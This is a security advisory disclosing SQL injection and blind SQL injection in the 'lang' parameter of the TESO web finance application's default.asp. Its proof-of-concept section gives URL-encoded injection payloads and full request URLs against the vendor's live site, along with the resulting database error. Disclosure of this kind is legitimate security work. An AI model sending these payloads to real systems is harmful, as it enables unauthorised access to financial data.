============================================
TESO web 2.0 SQLInjection/ Blind SQLInjection

=============================================

I. VULNERABILITY
-------------------------
#Title: TESO SQLInjection/ Blind SQLInjection
#Vendor:http://www.tesoweb.com
#Author:Juan Carlos García (@secnight)
#Follow me 
 http://www.highsec.es
 http://hackingmadrid.blogspot.com
 http://blogs.0verl0ad.com
Twitter:@secnight
Facebook:https://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?ref=tn_tnmn



II. DESCRIPTION
-------------------------

TESO is a powerful, free lets you take control of your money and your portfolio, both at home and in your business.

Its main features are:

Privacy and confidentiality. TESO stores no personal information nor are they ask in the registry.
Police their keys and no one can associate with the accounts stored in TESO.

Bank Reconciliation. TESO to load bank statements to compare (reconcile) with its own accounting.

Investment Securities. TESO updates the latest quotes from more than 1000 European and American
values​​, evaluate your portfolio and calculates realized and unrealized capital gains. You can
manage your portfolio TESO without carrying a full accounting of your money

Established that is not safe, it is not private and are in danger of data confidentiality 

III. PROOF OF CONCEPT
-------------------------

##Blind SQLInjection

Affected items

/default.asp 

Attack details

URL encoded GET input lang was set to -1' or '3'='3
GET /default.asp?lang=-1%27%20or%204%20%3d%20%275 HTTP/1.1
http://www.tesoweb.es/default.asp?lang=-1%27%20or%204%20%3d%20%275

##SQLinjection

Affected items

/default.asp 

Attack details

URL encoded GET input lang was set to 1'
Error message found: 

<font face="Arial" 
size=2>Syntax error in string in query expression '((idioma = '1'') and (activa = True))
order by fecha desc'.</font>

GET /default.asp?lang=1%27 HTTP/1.1

http://www.tesoweb.es/default.asp?lang=1%27


IV SOLUTION
------------------------

The script should filter metacharacters from user input. 
It's absolutely vital to sanitize user inputs to insure 
that they do not contain dangerous codes, whether to the
SQL server or to HTML itself. One's first idea is to strip
out "bad stuff", such as quotes or semicolons or escapes, 
but this is a misguided attempt. Though it's easy to point
out some dangerous characters, it's harder to point to all of them.


V. CREDITS
-------------------------

This vulnerability has been discovered
by Juan Carlos García(@secnight)


VII. LEGAL NOTICES
-------------------------

The Author accepts no responsibility for any damage
caused by the use or misuse of this information.